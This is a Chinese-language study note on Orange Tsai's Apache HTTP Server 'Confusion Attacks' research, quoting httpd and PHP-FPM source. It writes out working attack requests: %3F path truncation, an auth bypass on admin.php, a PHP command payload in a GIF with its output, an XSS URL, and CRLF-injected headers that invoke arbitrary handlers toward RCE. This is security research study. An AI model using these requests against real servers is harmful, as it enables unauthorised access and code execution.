# Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server! 閱讀筆記 ## source 來自orange大大發表的 https://blog.orange.tw/2024/08/confusion-attacks-ch.html apache source code https://github.com/apache/httpd/ ## 前言 挑選apache的原因是,整個 Httpd 的服務需要由數百個小模組合作完成客戶端的 HTTP 請求,但是在彼此模組間實作理解上的差異及不了解,可能導致漏洞(中間那塊是模組彼此共享的大struct) 官方列出的模組: https://httpd.apache.org/docs/2.4/mod/ ![image](https://hackmd.io/_uploads/B1Mzb5Q90.png) ## way to run php 1. mod_php 2. php_fpm 3. mod_fastcgi 4. ... # 攻擊面1: Confusion Attacks ## Filename Confusion 首先`r->filename` 感覺是個檔案系統路徑,然而在 Httpd 中,有些模組會把它當成網址來處理 如下,mod_rewrite(RewriteRule 語法將路徑透過指定的規則改寫)會把它當網址處理 ``` RewriteRule Pattern Substitution [flags] ``` 像是 ```config= RewriteEngine On RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml" ``` 若我們請求 `http://server/user/orange` 根據/user後面找到/orange放入$1 來抓到 ``` /var/user/orange/profile.yml ``` https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141 ```c /* * Apply a single RewriteRule */ static int apply_rewrite_rule(rewriterule_entry *p, rewrite_ctx *ctx) { ap_regmatch_t regmatch[AP_MAX_REG_MATCH]; apr_array_header_t *rewriteconds; rewritecond_entry *conds; // [...] for (i = 0; i < rewriteconds->nelts; ++i) { rewritecond_entry *c = &conds[i]; rc = apply_rewrite_cond(c, ctx); // [...] do the remaining stuff } /* Now adjust API's knowledge about r->filename and r->args */ r->filename = newuri; if (ctx->perdir && (p->flags & RULEFLAG_DISCARDPATHINFO)) { r->path_info = NULL; } splitout_queryargs(r, p->flags); // <------- [!!!] Truncate the `r->filename` // [...] } ``` 這邊看到 ```c splitout_queryargs(r, p->flags) ``` 追進去看到 https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L771 ```c static void splitout_queryargs(request_rec *r, int flags) { char *q; int split, skip; int qsappend = flags & RULEFLAG_QSAPPEND; int qsdiscard = flags & RULEFLAG_QSDISCARD; int qslast = flags & RULEFLAG_QSLAST; if (flags & RULEFLAG_QSNONE) { rewritelog((r, 2, NULL, "discarding query string, no parse from substitution")); r->args = NULL; return; } /* don't touch, unless it's a scheme for which a query string makes sense. * See RFC 1738 and RFC 2368. */ if ((skip = is_absolute_uri(r->filename, &split)) && !split) { r->args = NULL; /* forget the query that's still flying around */ return; } if (qsdiscard) { r->args = NULL; /* Discard query string */ rewritelog((r, 2, NULL, "discarding query string")); } q = qslast ? ap_strrchr(r->filename + skip, '?') : ap_strchr(r->filename + skip, '?'); if (q != NULL) { char *olduri; apr_size_t len; olduri = apr_pstrdup(r->pool, r->filename); *q++ = '\0'; if (qsappend) { if (*q) { r->args = apr_pstrcat(r->pool, q, "&" , r->args, NULL); } } else { r->args = apr_pstrdup(r->pool, q); } if (r->args) { len = strlen(r->args); if (!len) { r->args = NULL; } else if (r->args[len-1] == '&') { r->args[len-1] = '\0'; } } rewritelog((r, 3, NULL, "split uri=%s -> uri=%s, args=%s", olduri, r->filename, r->args ? r->args : "<none>")); } } ``` 總之他會把?後面的參數省略掉,所以如果使用 %2F -> / %3F -> ? ``` http://server/user/orange%2Fsecret.yml%3F ``` 這樣會變成 ``` /var/user/orange/secret.yml?profile.yml ``` 問號後面被當參數省略 ``` /var/user/orange/secret.yml ``` 路徑截斷就達成了 ## Mislead RewriteFlag Assignment 若管理員使用了下列方式設定 ``` RewriteEngine On RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php] ``` 如果請求附檔名是 .php 結尾則加上 mod_php 相對應的處理器 https://httpd.apache.org/docs/2.4/rewrite/flags.html 這邊設置了 [H=application/x-httpd-php] H -> header 意思是把.php,設置內容類型(MIME 類型),伺服器應將匹配的文件作為 PHP 文件處理 那如果我把一張 1.gif 設為 ``` <?=`id`;> ``` 如果單純請求 ``` http://server/upload/1.gif ``` 那理論上它是個.gif啥都不會執行 但是如果我這樣請求 ``` http://server/upload/1.gif %3F ooo.php ``` 因為結尾是.php所以接下來會把檔案強制解析成.php,接著?截斷把ooo.php丟棄,最後1.gif被當.php解析執行 ```php <?=`id`;> ``` 印出 ``` # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` ## ACL Bypass what is apache ACL? https://httpd.apache.org/docs/2.4/howto/access.html Filename Confusion 的第二個攻擊手法發生在 mod_proxy 身上,相較前一個攻擊是無條件將目標當成網址處理,這次則是因為模組間對 r->filename 的理解不一致所導致的認證及存取控制繞過 mod_proxy 在做的事情就是將請求導向到其它網址上 所以會把 r->filename 解析成url https://httpd.apache.org/docs/current/mod/core.html#files 首先是可以用apache server的file對於單一檔案加上限制,在預設安裝的 PHP-FPM 環境中,這種設定可以被直接繞過 ```html <Files "admin.php"> AuthType Basic AuthName "Admin Panel" AuthUserFile "/etc/apache2/.htpasswd" Require valid-user </Files> ``` 若我今天用這種方式請求 ``` http://server/admin.php%3Fooo.php ``` 此時 r->filename 欄位是 admin.php?ooo.php 理所當然與 admin.php 不符合 再來預設 PHP-FPM 在收到請求後預設透過set-handler -> mod_proxy https://blog.csdn.net/qq_21956483/article/details/82847744 ```html # Using (?:pattern) instead of (pattern) is a small optimization that # avoid capturing the matching pattern (as $1) which isn't used here <FilesMatch ".+\.ph(?:ar|p|tml)$"> SetHandler "proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost" </FilesMatch> ``` mod_proxy 會將 r->filename 重寫成以下網址 ``` proxy:fcgi:// ``` 後端在收到檔案名稱會進行特別處理 以下是處理邏輯 https://github.com/php/php-src/blob/ce51bfac759dedac1537f4d5666dcd33fbc4a281/sapi/fpm/fpm/fpm_main.c#L1044 ```c #define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://" #define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://" if (env_script_filename && strncasecmp(env_script_filename, APACHE_PROXY_FCGI_PREFIX, sizeof(APACHE_PROXY_FCGI_PREFIX) - 1) == 0) { /* advance to first character of hostname */ char *p = env_script_filename + (sizeof(APACHE_PROXY_FCGI_PREFIX) - 1); while (*p != '\0' && *p != '/') { p++; /* move past hostname and port */ } if (*p != '\0') { /* Copy path portion in place to avoid memory leak. Note * that this also affects what script_path_translated points * to. */ memmove(env_script_filename, p, strlen(p) + 1); apache_was_here = 1; } /* ignore query string if sent by Apache (RewriteRule) */ p = strchr(env_script_filename, '?'); if (p) { *p =0; } } ``` 一樣也可以看到針對 ? 進行截斷,取出實際的檔案路徑並執行 (也就是 /var/www/html/admin.php) ```c p = strchr(env_script_filename, '?'); if (p) *p = 0; ``` 這樣就可以bypass file限制了 認證模組以及 mod_proxy 間對 r->filename 欄位理解的不一致 -> bypass ![image](https://hackmd.io/_uploads/BkXOSjQ9R.png) 總結 ``` HTTP -> access checker -> /var/www/html/admin.php?ooo.php(r->filename) HTTP -> mod_proxy -> proxy:fcgi:// ?截斷,訪問proxy:fcgi:// ``` # 攻擊面2: DocumentRoot Confusion 針對這個設定 ```html DocumentRoot /var/www/html RewriteRule ^/html/(.*)$ /$1.html ``` 若訪問這樣 ``` http://server/html/about ``` 會訪問到 /var/www/html/about.html 還是 /about.html 呢? ans: 兩個都會 因為httpd會去嘗試存取帶有 DocumentRoot 的路徑以及沒有的路徑 https://github.com/apache/httpd/blob/c3ad18b7ee32da93eabaae7b94541d3c32264340/modules/mappers/mod_rewrite.c#L4939 ```c if(!(conf->options & OPTION_LEGACY_PREFIX_DOCROOT)) { uri_reduced = apr_table_get(r->notes, "mod_rewrite_uri_reduced"); } if (!prefix_stat(r->filename, r->pool) || uri_reduced != NULL) { // <------ [1] access without root int res; char *tmp = r->uri; r->uri = r->filename; res = ap_core_translate(r); // <------ [2] access with root r->uri = tmp; if (res != OK) { rewritelog((r, 1, NULL, "prefixing with document_root of %s" " FAILED", r->filename)); return res; } rewritelog((r, 2, NULL, "prefixed with document_root to %s", r->filename)); } rewritelog((r, 1, NULL, "go-ahead with %s [OK]", r->filename)); return OK; } ``` https://httpd.apache.org/docs/current/rewrite/remapping.html#rewrite-query 從官方範例文件可以看到一些有問題的寫法 ``` RewriteRule "^/html/(.*)$" "/$1.html" ``` ``` RewriteRule "^(.*)\.(css|js|ico|svg)" "$1\.$2.gz" ``` 若能控 RewriteRule 的目標前綴那我們是不是就能瀏覽作業系統上的任意檔案了嗎? 開始基於項設定做攻擊 ``` RewriteEngine On RewriteRule "^/html/(.*)$" "/$1.html" ``` ### Local Gadgets Manipulation! 到了這邊,或許會想說可以去讀像是`/etc/passwd`等任意檔案但其實不然,原因是 ``` <Directory /> AllowOverride None Require all denied </Directory> ``` https://luckymrwang.github.io/2015/06/03/Apache-AllowOverride-None-%E5%8F%8A-Option-%E8%AF%A6%E8%A7%A3/ https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115 apache內建把根目錄及其所有子目錄的存取禁用,他會忽略.htaccess的rewrite規則,避免了危險的rewrite 不過這邊發現了 ubuntu/debian上 https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L165 ``` <Directory /usr/share> AllowOverride None Require all granted </Directory> ``` /usr/share是被允許存取的,所以可以嘗試利用這份文件中,所有的教學範例、說明文件、單元測試檔案來濫用 也就是把檔案當gadget串出各種攻擊 #### Local Gadget to Information Disclosure websocketd: /usr/share/doc/websocketd/examples/php/ 下的範例php可以leak 敏感環境變數 https://github.com/Textalk/websocket-php/tree/master/examples 像是NGINX跟jetty也有許多可以利用,這些服務的預設 Web Root 就在 /usr/share,所以可以讀出很多敏感資訊 /usr/share/nginx/html/ /usr/share/jetty9/etc/ /usr/share/jetty9/webapps/ 另外像是Davical 套件所存在的 setup.php可以讀出phpinfo ![image](https://hackmd.io/_uploads/SJYOUqdi0.png) #### Local Gadget to XSS /usr/share/libreoffice/help/help.html ```php var url = window.location.href; var n = url.indexOf('?'); if (n != -1) { // the URL came from LibreOffice help (F1) var version = getParameterByName("Version", url); var query = url.substr(n + 1, url.length); var newURL = version + '/index.html?' + query; window.location.replace(newURL); } else { window.location.replace('latest/index.html'); } ``` 這是libreoffice提供的語言切換功能 這上面把version放入到index.html前,所以newURL被加入js就可以達成XSS > /usr/share/libreoffice/help/help.html??Version=javascript:aler(1)// #### Local Gadget to LFI JpGraph、jQuery-jFeed、 WordPress 或 Moodle 外掛等自帶的教學或debug檔案可以串出LFI /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php /usr/share/javascript/jquery-jfeed/proxy.php /usr/share/moodle/mod/assignment/type/wims/getcsv.php https://github.com/jfhovinne/jFeed/blob/master/proxy.php ```php <?php header('Content-type: application/xml'); $handle = fopen($_REQUEST['url'], "r"); if ($handle) { while (!feof($handle)) { $buffer = fgets($handle, 4096); echo $buffer; } fclose($handle); } ?> ``` fopen未過濾導致任意讀 ![image](https://hackmd.io/_uploads/rJpZ_cdoA.png) #### Local Gadget to SSRF MagpieRSS -> magpie_debug.php ```php= ... if ( isset($_GET['url']) ) { $url = $_GET['url']; } else { $url = 'http://magpierss.sf.net/test.rss'; } test_library_support(); $rss = fetch_rss( $url ); ... ``` fetch_rss可以做SSRF https://github.com/cogdog/feed2js/blob/master/magpie_debug.php #### Local Gadget to RCE 舊版本的phpunit檔案存在可以直接用CVE-2017-9841 https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841 phpLiteAdmin預設密碼admin ### Jailbreak from Local Gadgets 接下來是跳脫出/usr/share Httpd 發行版中預設開啟了 FollowSymLinks https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L160 ``` <Directory /> Options FollowSymLinks AllowOverride None Require all denied </Directory> ``` 所以可以利用symlink機制來讀到以外的檔案 https://httpd.apache.org/docs/current/mod/core.html#options #### Jailbreak from Local Gadgets ``` Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/ Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/ MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/ SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/ ``` #### Jailbreak Local Gadgets to Redmine RCE Redmine的雙層symlink 到 RCE ``` $ file /usr/share/redmine/instances/ symbolic link to /var/lib/redmine/ $ file /var/lib/redmine/config/ symbolic link to /etc/redmine/default/ $ ls /etc/redmine/default/ database.yml secret_key.txt ``` 從/usr/share跳到/var/lib/redmine,繼續跳到/etc/redmine讀取到了secret key secret_key.txt是簽章所使用的 -> RoR 已知的金鑰將惡意 Marshal 物件簽章加密後嵌入 Cookie,接著透過伺服器端的反序列化最終實現遠端程式碼 https://drive.google.com/file/d/1UMxphxFxwRf7wbrw4_Hr56KGPzpLU3Ef/view ![image](https://hackmd.io/_uploads/SkBrj5OoA.png) # 攻擊面3:Handler Confusion 這兩種都可以讓php跑起來 ``` AddHandler application/x-httpd-php .php AddType application/x-httpd-php .php ``` https://github.com/apache/httpd/blob/2.4.58/server/config.c#L420 ```c AP_CORE_DECLARE(int) ap_invoke_handler(request_rec *r) { // [...] if (!r->handler) { if (r->content_type) { handler = r->content_type; if ((p=ap_strchr_c(handler, ';')) != NULL) { char *new_handler = (char *)apr_pmemdup(r->pool, handler, p - handler + 1); char *p2 = new_handler + (p - handler); handler = new_handler; /* exclude media type arguments */ while (p2 > handler && p2[-1] == ' ') --p2; /* strip trailing spaces */ *p2='\0'; } } else { handler = AP_DEFAULT_HANDLER_NAME; } r->handler = handler; } result = ap_run_handler(r); ``` 來讀讀這段code 先檢查 r->handler 是否已設置 如果 r->handler 沒有設置,代碼會嘗試根據 r->content_type 來設置它。 根據 r->content_type 設置 handler 如果 r->content_type 已設置,代碼會將其值賦給 handler。 如果 r->content_type 沒有設置,則使用默認的 handler(AP_DEFAULT_HANDLER_NAME) 調用 ap_run_handler: 最後,通過 `ap_run_handler(r)` 調用 handler 來處理請求。 因此兩種方法都可以找到對的handler ## Overwrite the Handler 若 apache HTTP Server 透過 AddType 將 PHP 運行起來 ``` AddType application/x-httpd-php .php ``` 呼叫 `http://server/config.php` type_checker 根據 addtype 設定的附檔名將相對應的內容複製到 r->content_type 而整個http週期並未給r -> handler賦值 r->content_type在進入到ap_invoke_handler前被拿來當成模組處理器使用 看到上述的source 也可以看到會根據 r->content_type 設置 handler 但是,若進入ap_invoke_handler前r->content_type會發生甚麼問題呢 ## Overwrite Handler to Disclose PHP Source Code 首先可以去看看這篇 https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf 若是用了錯誤的contenet length,除了報錯外,也會回傳php source code ![image](https://hackmd.io/_uploads/B1_48jOi0.png) ModSecurity 在使用 APR 沒有檢查好回傳值 導致r -> content_type被改寫成了text/html,因為它會想要丟一個錯誤的頁面而被覆寫 這就回傳了兩個回應 一個是錯誤頁面 一個是應該用application/x-httpd-php的php頁面,被覆蓋成text/html當文字回傳 造成了double response https://github.com/owasp-modsecurity/ModSecurity/issues/2514 ## Invoke Arbitrary Handlers 然而觀察到一件事情是,其實只要能夠寫掉r -> content_type就會造成呼叫任意 Apache HTTP Server 的內部模組處理器 然而發生問題的地方位於最後段 ![image](https://hackmd.io/_uploads/r1l9ijOo0.png) 到底要怎麼觸發 這邊基於這個來做 ```php use CGI; my $q = CGI->new; my $redir = $q->param("r"); if ($redir =~ m{^https?://}) { print "Location: $redir\n"; } print "Content-Type: text/html\n\n"; ``` 這是一段有問題的寫法,因為redir可控,導致了CRLF注入,從而造成了可以偽造標頭 https://ithelp.ithome.com.tw/articles/10242682 另外看一下RFC https://datatracker.ietf.org/doc/html/rfc3875 他規定了網址轉址的規範 接下來就是開始追code ```c if ((ret = ap_scan_script_header_err_brigade_ex(r, bb, sbuf, // <------ [1] APLOG_MODULE_INDEX))) { ret = log_script(r, conf, ret, dbuf, sbuf, bb, script_err); // [...] if (ret == HTTP_NOT_MODIFIED) { r->status = ret; return OK; } return ret; } location = apr_table_get(r->headers_out, "Location"); if (location && r->status == 200) { // [...] } if (location && location[0] == '/' && r->status == 200) { // <------ [2] /* This redirect needs to be a GET no matter what the original * method was. */ r->method = "GET"; r->method_number = M_GET; /* We already read the message body (if any), so don't allow * the redirected request to think it has one. We can ignore * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR. */ apr_table_unset(r->headers_in, "Content-Length"); ap_internal_redirect_handler(location, r); // <------ [3] return OK; } ``` 這裡檢查了Location標頭是否存在且以/開頭,並且HTTP狀態碼是200(即請求成功)。這代表伺服器希望將客戶端重定向到同一個伺服器上的不同位置 當需要進行重定向時,這行代碼會處理內部重定向。也就是說,伺服器會把當前的請求路徑替換成Location標頭指定的新路徑,然後重新處理請求 ```c AP_DECLARE(void) ap_internal_redirect_handler(const char *new_uri, request_rec *r) { int access_status; request_rec *new = internal_internal_redirect(new_uri, r); // <------ [1] /* ap_die was already called, if an error occured */ if (!new) { return; } if (r->handler) ap_set_content_type(new, r->content_type); // <------ [2] access_status = ap_process_request_internal(new); // <------ [3] if (access_status == OK) { access_status = ap_invoke_handler(new); // <------ [4] } ap_die(access_status, new); } ``` 追進去ap_internal_redirect_handler看發現了關鍵 ``` ap_set_content_type(new, r->content_type); ``` 直接copy過來 所以就有一個新的http流程了 ![image](https://hackmd.io/_uploads/BJVXAiusC.png) ![image](https://hackmd.io/_uploads/SkfERjusC.png) 最後回來看CRLF的部分 ``` http://server/cgi-bin/redir.cgi?r=http:// %0d%0a Location:/ooo %0d%0a Content-Type:server-status %0d%0a %0d%0a ``` 這樣來偽造content-type ![image](https://hackmd.io/_uploads/ByoHRodsA.png) 這樣任意控handler 就可以用惡意的圖片等,然後用想要的handler去把圖片當腳本用來執行 ``` http://server/cgi-bin/redir.cgi?r=http:// %0d%0a Location:/uploads/avatar.webp %0d%0a Content-Type:application/x-httpd-php %0d%0a %0d%0a ``` ## Arbitrary Handler to RCE https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html ## 結語 其中我最喜歡的兩個部分第一個是把檔案當gadget用,透過伺服器上現有的不管是教學檔案或是任何文件濫用,串出了RCE 另外透過symlink來跳脫出當前目錄,去濫用到其他目錄的檔案,串出了RCE 原本開發者以為安全的教學文件(因為使用者戳不到)但在因為一個?被截斷後,導致存取到了伺服器上的其他資源,以及藉由方便的symlink跳脫出目錄,十分的新穎,原本看似無害的東西,透過一連串的觸發,達成RCE,真的很酷 膜拜orange orz 這邊挖個坑,日後會來復現